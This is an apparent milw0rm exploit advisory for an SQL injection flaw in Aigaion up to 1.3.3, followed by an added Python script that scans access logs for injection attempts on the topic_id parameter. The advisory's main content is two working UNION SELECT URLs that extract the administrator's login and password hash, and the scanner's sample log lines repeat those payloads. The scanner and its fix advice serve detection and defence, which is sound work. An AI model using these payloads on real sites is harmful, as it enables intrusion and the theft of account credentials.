Aigaion 1.3.3 topic topic_id Remote SQL Injection Vulnerability

--==+================================================================================+==--
--==+                       Aigaion <= 1.3.3 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

EXPLOITS:

http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--

# milw0rm.com [2007-07-09]
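
Added example, not part of the original advisory: a log check for the requests shown above, assuming topic_id is a numeric identifier (as the 9999 in the URLs suggests) and that the server writes Apache combined-format access logs. The sample log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Jul/2007:10:01:02 +0000] "GET /index.php?page=topic&topic_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Jul/2007:10:03:44 +0000] "GET /index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person-- HTTP/1.1" 200 734 "-" "-"',
    '203.0.113.9 - - [09/Jul/2007:10:03:50 +0000] "GET /index.php?page=topic&topic_id=9999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2Fnull HTTP/1.1" 200 734 "-" "-"',
    '203.0.113.9 - - [09/Jul/2007:10:04:10 +0000] "GET /index.php?page=topic&topic_id=12%27 HTTP/1.1" 200 310 "-" "-"',
    '198.51.100.7 - - [09/Jul/2007:10:05:00 +0000] "GET /index.php?page=publication&pub_id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)


def classify_topic_id(value):
    """Return None for a plain integer, otherwise a verdict string."""
    if re.fullmatch(r"\d+", value):
        return None
    # /**/ stands in for whitespace in the advisory's URLs; undo that first.
    normalized = INLINE_COMMENT_RE.sub(" ", value)
    if UNION_SELECT_RE.search(normalized):
        return "union-select"
    return "non-integer"


def scan(lines):
    """Return (client_ip, verdict, decoded_value) for each suspicious topic_id."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes, so encoded variants are classified too.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in params.get("topic_id", []):
            verdict = classify_topic_id(value)
            if verdict:
                findings.append((client, verdict, value))
    return findings


if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value[:60]}")
```

The same integer-only rule belongs in the application itself: casting topic_id to an integer or binding it as a query parameter removes the injection point, while the log check only shows who has been probing it.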




CypherXero 07/09/2007

				